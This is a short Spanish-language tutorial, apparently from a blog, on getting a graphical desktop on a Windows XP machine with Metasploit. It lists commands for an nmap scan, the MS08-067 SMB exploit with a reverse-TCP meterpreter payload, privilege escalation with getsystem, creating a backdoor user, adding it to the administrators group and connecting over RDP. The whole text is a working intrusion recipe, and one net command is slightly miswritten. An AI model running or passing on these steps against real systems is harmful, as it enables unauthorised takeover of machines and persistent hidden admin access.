CONSEGUIR GUI EN XP CON METASPLOIT

Una vez presentado el entorno, aquí van los pasos:

1- Comprobar la máquina vulnerada, para hacerlo de forma rápida se utilizará nmap.

Sintaxis: nmap -O IP

2- Una vez comprobado, ejecutar la consola de Metasploit. Sintaxis: msfconsole

3- Cargar el exploit. En este caso utilizamos uno que ataca al protocolo smb.

Sintaxis: use exploit/windows/smb/ms08_067_netapi

4- Seleccionamos un PAYLOAD, se utilizará un meterpreter con conexión inversa.

Sintaxis: set PAYLOAD windows/meterpreter/reverse_tcp

5- Se coloca la IP local. Sintaxis: set LHOST IP

6- Se coloca la IP remota.

Sintaxis: set RHOST IP

7- Comprobar que no queden campos vacíos (opcional).

Sintaxis: show options

Debe salir algo así:

Nota: los campos de las IP deben ser los vuestros

8- Lanzar el exploit.
 Sintaxis: exploit

9- Una vez en meterpreter controlamos el sistema.

Sintaxis: getsystem

10- Una vez tenemos privilegios hay que crear un nuevo usuario.

sintaxis: run getgui -u usuario -p password -e

11- Obtenemos una shell en el sistema. Sintaxis: shell

12- Elevar privilegios al usuario.

Sintaxis: net localgroups administradores usuario /add Donde administradores es el

nombre del grupo de admins.

13- En una nueva pestaña de la terminal se utiliza la herramienta rdesktop.

Sintaxis: rdesktop -u usuario -p password IP

Y se abre una ventana con la GUI.